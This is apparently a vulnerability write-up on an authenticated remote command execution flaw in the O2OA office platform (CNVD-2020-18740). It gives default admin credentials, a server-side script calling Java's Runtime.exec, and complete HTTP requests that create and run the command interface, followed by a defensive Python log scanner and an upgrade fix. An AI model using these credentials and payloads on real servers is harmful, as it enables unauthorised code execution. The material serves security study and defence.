True unfreedom is building a cage inside one's own heart.

O2OA backend remote command execution vulnerability

Vulnerability Overview

O2OA is an open-source, free enterprise and team office platform made up of four major components: portal management, process management, information management, and data management. It integrates functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration to meet the management and collaboration needs of enterprises. The O2OA system has a remote code execution vulnerability in the invoke interface; an attacker who can reach it can execute arbitrary code on the server.

Scope of Impact

Title: "O2OA"
CNVD-2020-18740

Exploitation Process

Pull the environment using Docker

docker pull oxnme/o2oa:6.1.3

docker run --name o2server -p 80:80 -p 20010:20010 -p 20020:20020 -p 20030:20030 -d o2oa/o2server

Weak password: xadmin/o2oa@2022

After setting up the environment, directly access port 8001 through a browser, and it will automatically redirect to the O2OA login page.

http://192.168.31.151:8001/x_desktop/index.html


Enter the default password, xadmin/o2, to log in successfully.

Note: The default password for the new version of O2OA is: xadmin/o2oa@2022


Find service management


Add interface configuration


Enter the following script as the content of the interface; it is what the server executes.

var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));

var result = [];
while (true) {
    var oneline = bufReader.readLine();
    result.push(oneline);
    if (!oneline) break;
}
var result = { "Result": result };
this.response.setBody(result, "application/json"); 


You can also create the interface configuration with the following request.


The request package is as follows:

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}

Execute the command directly.


The request package is as follows:

POST 192.168.31.151:20030/x_program_center/jaxrs/invoke/cmd/execute
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}

Each different command requires creating a separate interface configuration.
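As an added defensive example (not part of the original write-up), the following Python scans request-log lines for interface definitions posted to the invoke endpoint whose script text reaches the JVM process-execution API, as in the request body above. The tab-separated log format, the sample lines and the pattern list are constructed assumptions.

```python
import json
import re

# Script fragments that indicate an interface definition breaks out of the
# server-side scripting layer into JVM process execution (the primitive used
# in the CNVD-2020-18740 write-up). Assumed list; extend for your environment.
DANGEROUS_PATTERNS = [
    re.compile(r"java\.lang\.Runtime\b"),
    re.compile(r"\bgetRuntime\s*\(\s*\)\s*\.\s*exec\b"),
    re.compile(r"java\.lang\.ProcessBuilder\b"),
]

INVOKE_PREFIX = "POST /x_program_center/jaxrs/invoke"

# Constructed sample log: one request per line, "METHOD PATH<TAB>BODY".
SAMPLE_LOG = [
    'POST /x_program_center/jaxrs/invoke?v=6.3\t{"id":"report","name":"report",'
    '"text":"this.response.setBody({\\"ok\\":true}, \\"application/json\\");"}',
    'POST /x_program_center/jaxrs/invoke?v=6.3\t{"id":"cmd","name":"cmd",'
    '"text":"var r = java.lang.Runtime.getRuntime().exec(\\"id\\");"}',
    'GET /x_desktop/index.html\t',
]


def classify_request(line):
    """Return (interface_id, matched_fragment) when a line creates or updates an
    invoke interface whose script calls into JVM process execution, else None."""
    method_path, _, body = line.partition("\t")
    if not method_path.startswith(INVOKE_PREFIX):
        return None
    try:
        cfg = json.loads(body)
    except json.JSONDecodeError:
        return None  # not an interface definition (or truncated log line)
    text = cfg.get("text", "")
    for pattern in DANGEROUS_PATTERNS:
        match = pattern.search(text)
        if match:
            return (cfg.get("id", "?"), match.group(0))
    return None


def scan(lines):
    """Collect every flagged interface definition from an iterable of log lines."""
    return [hit for hit in (classify_request(line) for line in lines) if hit]


if __name__ == "__main__":
    for interface_id, fragment in scan(SAMPLE_LOG):
        print(f"ALERT interface '{interface_id}' defines script using {fragment}")
```

Pattern matching on the stored script is a first-line alert, not a complete control; reviewing every saved interface definition and restricting who can reach the service-management feature catch what string matching misses.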

Recommended Fixes

Upgrade O2OA to a version in which this issue is fixed.

References

http://wiki.peiqi.tech/wiki/oa/O2OA/O2OA%20invoke%20%E5%90%8E%E5%8F%B0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CNVD-2020-18740.html
